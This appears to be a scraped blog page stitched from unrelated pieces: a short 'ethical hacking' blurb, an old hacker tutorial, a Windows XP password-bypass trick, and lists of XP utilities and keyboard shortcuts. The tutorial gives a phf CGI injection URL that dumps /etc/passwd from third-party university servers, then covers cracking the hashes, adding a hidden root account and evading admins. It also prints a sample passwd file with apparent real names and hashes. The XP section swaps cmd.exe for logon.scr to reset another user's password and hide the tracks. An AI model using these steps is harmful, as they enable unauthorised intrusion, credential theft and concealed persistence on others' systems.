What is Ethical Hacking ?

First , I make it clear that being hacker does not mean being a delinquent.

Nowadays , companies are hiring services from “Ethical Hackers'” to detect vulnerabilities of their computer science system and therefore,improve their defense measures.
Ethical Hackers, with their knowledge, help to define the parameters of defense. They do “controlled” attacks, previsousl authorized by the organization, to verify the system’s defenses.They create groups to learn new attacks techniques, exploitations and vulnerabilities, among others, they work as researchers for the security field.
The Methodology of ethical hacking is divided in several phases

• Attack Planning
• Internet Access
• Test and Execution of an attack
• Gathering information.
• Analysis
• Assessment and Diagnosis
• Final Report

Hackers use is the OSSTMM Open Sources security Testing Methodology.This methodology is for the testing of any security system, from guards and doors to mobile and satellite communications and satellites. 


Ethical hackers,

How to Secure  Computer
How firewall Protect  Your Computer
System Crash

Shell

Hacking

What isUnix Shell Programing

    
  Have a shell

I have read many a hacking e-zines, and 'how to hack' documents before. They
are ok, interesting etc.  but they always show you how to get root through a
shell, what people seem to forget is the fact that you have to actually get
the password before you can use a shell to an account. You might be lucky
and find that l:guest p:guest will work. In this text I will show you how
easy hacking is ( on old deformed systems ) and how you can get a shell of
some sort in 24 hours after reading this. I am not going to go on to explain
how to get root after getting a shell as there are 1000's of texts and C
programs which explain this.
OK, the very first thing you need to do is to have a WWW browser, a telnet
program, john the ripper kracker program ( i recommend ) and a good
dictionary file.
WWW Browser - Netrape or MSIE are fine
Telnet Program - One which lets you set which port you want to connect to
John The Ripper - Will be at http://www.sinnerz.com/darkfool
Dictionary File - Found at many hacking web sites. Do a search for one
Ok, every net user/wanna be hacker will have most of those programs and if
ya don't there really easy to get a hold of.
OK, now I am going to tell you something about Japan. They make your stero,
they made the bits inside your computer, they made your car, they made
everything electronic around you, you have their eyes at the end of your

Shell

nob, but they are rubbish at one thing, the internet and security. The
honestly don't know anything about internet security, I have rooted or got
shells on many a japanese servers. These are my favourite systems to attack
because they are soooooo easy. I am also told that Australian servers are
very easy too, some Berkeley UNiversity machines are very easy to krack too.
Next thing you got to do is fire up your WWW browser. Goto AltaVista
http://www.alta-vista.digital.com if you don't know already this is a search
engine which has some very nice advance features.
Once here in the search field box type this  url:ac.jp and press search,
this looks for all URL's with ac.jp in.  This is academic places in Japan,
similar to the US which has .edu instead. You will be presented with a load
of web pages which text you probably can't read because its all in some
funny language. More importantly is the URL which they point out, for
example, www.mo.cs.rekimoko.ac.jp    , notice the ac.jp at the end of it.
Click on the link to the site ( longer server urls are easier to break into
BTW ). When the URL appears on the WWW browser box at the top of the screen
add this line to the end of it.
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
i.e
http://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you 313375 out there, yes, i know this is the phf technique and it is
virtually dead, but you'll be surpised where you can use this.
This technique of finding the password file to the system is old, it was
first used in November 1996 on the FBI web page by a few hackers. It has
been patched up by a lot of servers, so this won't work on www.nasa.gov or
most of www.*.com  but still works on many University servers outside of EU
and US.
Ok, once the URL has been entered you will see a number or things :-
Error 404
/cgi-bin/phf is not found on this server
OR
WARNING
You do not have permission to view /cgi-bin/phf/ on this server
There are a number of other things the server might say, but the thing you
want it to say is the following :-
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr.YmO.:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
etc.......
This means you have hit the jackpot !
If you get something similar to this but all lines have something similar to
the following :-
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu  TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
( notice the * )  if you don't know already this means its shadowed and you
cannot work out the password using a shadowed file.
If some but not all of the logins have * in them its ok, its worthwhile
getting the ones which aren't shadowed, hey, a shell is a shell !
Get all the lines which aren't shadowed and then paste them into notepad,
write the name of the server in the top line of the file and save it.
Ok now for the next bit, this is fairly simple but can be a lengthy process
depending upon which speed machine you have and how big your password file
is and dictionary file. Use john the ripper or whatever password cracker you
are using, although i recommend john the ripper because its quick. This will
probably take a long time so go to the pub or have a drive or something.......
If you are lucky enough to work out the passwords to the logins then well
done, if you don't, them find another server or increase the size of your
dictionary file, make it as big as you can, the bigger the better, the more
luck you will have in finding the password.
OK, you got some passwords to a few logins, if you got root them jump around
the room with joy ( I do ). If you didn't then, well, atleast you got
yourself some shells. Now, if you want to keep these shells without anyone
knowing then your best bet is to telnet to the site at port 79, you will
have a blank prompt, here type in the username of the account you cracked,
it will tell you the last time they logged in, do this for all the accounts,
use the account which isn't used very much, the best ones are the ones which
say ' User Never Logged On ' because then the account is basically yours !
{ Note: If you get root type the following at the shell prompt :-
echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwd
This wil allow you to login to the server with l:myserver so you don't get
admin suspicous when they see people login in as root. } 
Hide yourself as much as possible, if you already have a shell then go
through that first when logging on, or, telnet to the hacked shell and then
re-telnet to the hacked shell using the hacked shell, if you see what I
mean, so your who appears as localhost. Get some C scripts which delete your
presence etc...
Thats it, if there's demand to explain this in further detail then please
e-mail me telling me you want a follow up, I don't do personal help so don't
e-mail me asking for help PLEASE DON'T !

How to Hack admin Passords

How to hack Windows XP Admin Passwords

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Windows xp Hidden Application

 
To run any of these apps go to Start > Run and type the executable name (ex.charmap.exe)
WINDOWS XP HIDDEN APPS   :
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
 Search Amazon.com for mac os x 10.6 snow leopard

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).


14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).
17) File siganture verification tool = sigverif.exe
18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).
21) Microsoft Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc used to manage group policies, and permissions

Technorati Tags: Hidden Application of xp,Hidden xp,windows Hidden Applicaion,hidden windows

LiveJournal Tags: Hidden Application of xp,Hidden xp,windows Hidden Applicaion,hidden windows

del.icio.us Tags: Hidden Application of xp,Hidden xp,windows Hidden Applicaion,hidden windows

 

Keyboard Shortcuts

General Keyboard Shortcuts, General Keyboard Shortcuts

CTRL+C (Copy)

CTRL+X (Cut)

CTRL+V (Paste)

CTRL+Z (Undo)

DELETE (Delete)

SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)

CTRL while dragging an item (Copy the selected item)

CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)

F2 key (Rename the selected item)

CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)

CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)

CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)

CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)Microsoft Natural Ergo Keyboard 4000

CTRL+SHIFT with any of the arrow keys (Highlight a block of text)

SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)

CTRL+A (Select all)

 

F3 key (Search for a file or a folder)

ALT+ENTER (View the properties for the selected item)

ALT+F4 (Close the active item, or quit the active program)

ALT+ENTER (Display the properties of the selected object)

ALT+SPACEBAR (Open the shortcut menu for the active window)

CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)

ALT+TAB (Switch between the open items)

ALT+ESC (Cycle through items in the order that they had been opened)

F6 key (Cycle through the screen elements in a window or on the desktop)

F4 key (Display the Address bar list in My Computer or Windows Explorer)

SHIFT+F10 (Display the shortcut menu for the selected item)

ALT+SPACEBAR (Display the System menu for the active window)

CTRL+ESC (Display the Start menu)

ALT+Underlined letter in a menu name (Display the corresponding menu)

Underlined letter in a command name on an open menu (Perform the corresponding command)

F10 key (Activate the menu bar in the active program)

RIGHT ARROW (Open the next menu to the right, or open a submenu)

LEFT ARROW (Open the next menu to the left, or close a submenu)

F5 key (Update the active window)

BACKSPACE (View the folder one level up in My Computer or Windows Explorer)

ESC (Cancel the current task)

SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)

Dialog Box Keyboard Shortcuts

CTRL+TAB (Move forward through the tabs)

CTRL+SHIFT+TAB (Move backward through the tabs)

TAB (Move forward through the options)

SHIFT+TAB (Move backward through the options)

ALT+Underlined letter (Perform the corresponding command or select the corresponding option)

ENTER (Perform the command for the active option or button)

SPACEBAR (Select or clear the check box if the active option is a check box)

Arrow keys (Select a button if the active option is a group of option buttons)

F1 key (Display Help)

F4 key (Display the items in the active list)

BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)

Microsoft Natural Keyboard Shortcuts

Windows Logo (Display or hide the Start menu)

Windows Logo+BREAK (Display the System Properties dialog box)

Windows Logo+D (Display the desktop)

Windows Logo+M (Minimize all of the windows)

Windows Logo+SHIFT+M (Restore the minimized windows)

Windows Logo+E (Open My Computer)

Windows Logo+F (Search for a file or a folder)

CTRL+Windows Logo+F (Search for computers)

Windows Logo+F1 (Display Windows Help)

Windows Logo+ L (Lock the keyboard)

Windows Logo+R (Open the Run dialog box)

Windows Logo+U (Open Utility Manager)

Accessibility Keyboard Shortcuts

Right SHIFT for eight seconds (Switch FilterKeys either on or off)

Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)

Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)

SHIFT five times (Switch the StickyKeys either on or off)

NUM LOCK for five seconds (Switch the ToggleKeys either on or off)

Windows Logo +U (Open Utility Manager)

Windows Explorer Keyboard Shortcuts

END (Display the bottom of the active window)

HOME (Display the top of the active window)

NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)

NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

NUM LOCK+Minus sign (-) (Collapse the selected folder)

LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)

RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

Shortcut Keys for Character Map

After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:

RIGHT ARROW (Move to the right or to the beginning of the next line)

LEFT ARROW (Move to the left or to the end of the previous line)

UP ARROW (Move up one row)

DOWN ARROW (Move down one row)

PAGE UP (Move up one screen at a time)

PAGE DOWN (Move down one screen at a time)

HOME (Move to the beginning of the line)

END (Move to the end of the line)

CTRL+HOME (Move to the first character)

CTRL+END (Move to the last character)

SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)

Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

CTRL+O (Open a saved console)

CTRL+N (Open a new console)

CTRL+S (Save the open console)

CTRL+M (Add or remove a console item)

CTRL+W (Open a new window)

F5 key (Update the content of all console windows)

ALT+SPACEBAR (Display the MMC window menu)

ALT+F4 (Close the console)

ALT+A (Display the Action menu)

ALT+V (Display the View menu)

ALT+F (Display the File menu)

ALT+O (Display the Favorites menu)

MMC Console Window Keyboard Shortcuts

CTRL+P (Print the current page or active pane)

ALT+Minus sign (-) (Display the window menu for the active console window)

SHIFT+F10 (Display the Action shortcut menu for the selected item)

F1 key (Open the Help topic, if any, for the selected item)

F5 key (Update the content of all console windows)

CTRL+F10 (Maximize the active console window)

CTRL+F5 (Restore the active console window)

ALT+ENTER (Display the Properties dialog box, if any, for the selected item)

F2 key (Rename the selected item)

CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

Remote Desktop Connection Navigation

CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)

ALT+PAGE UP (Switch between programs from left to right)

ALT+PAGE DOWN (Switch between programs from right to left)

ALT+INSERT (Cycle through the programs in most recently used order)

ALT+HOME (Display the Start menu)

CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)

ALT+DELETE (Display the Windows menu)

CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)

Microsoft Internet Explorer Navigation

CTRL+B (Open the Organize Favorites dialog box)

CTRL+E (Open the Search bar)

CTRL+F (Start the Find utility)

CTRL+H (Open the History bar)

CTRL+I (Open the Favorites bar)

CTRL+L (Open the Open dialog box)

CTRL+N (Start another instance of the browser with the same Web address)

CTRL+O (Open the Open dialog box, the same as CTRL+L)

CTRL+P (Open the Print dialog box)

 

CTRL+R (Update the current Web page)

CTRL+W (Close the current window)

Technorati Tags: keyboard,shortcut,keyboard shoartcut

LiveJournal Tags: keyboard,shortcut,keyboardshortcut,windows

Ethical Hacking

Being a hacker does not mean being a delinquent.Nowadays,companies are hiring services from “ethical Hackers “ to detect vulnerabilities of their computer science system and therefore,improve their defense measures.
Ethical Hackers,with their knowledge,help to define the parameters of defense.They do “controlled” attacks,previously authorized by the organization, to verify the system’s defenses.they create groups to learn new attack techniques,exploitations and vulnerabilities, among others,They work as researchers for the security field.

Technorati Tags: Hacking,Ethical Hacking,Internet,Security,Intenet access,OSSTMM

Attack is the secret of defense;defense is the planning of attack  by Sun Tzu
Ethical hacking is divided in several Phases :

• Attack Planning
• Internet Access
• Test and Execution of an attack
• Gathering information
• Analysis
• Assessment and Diagnosis
• Final Report.

Ethical Hackers use the OSSTMM methodology(open source security testing methodology manual).This methodology is for the testing of any security system,from guards and doors to mobile and satellite communications and satellites.
TCP/IP model
Topologies
HTTP and The Web (Internet)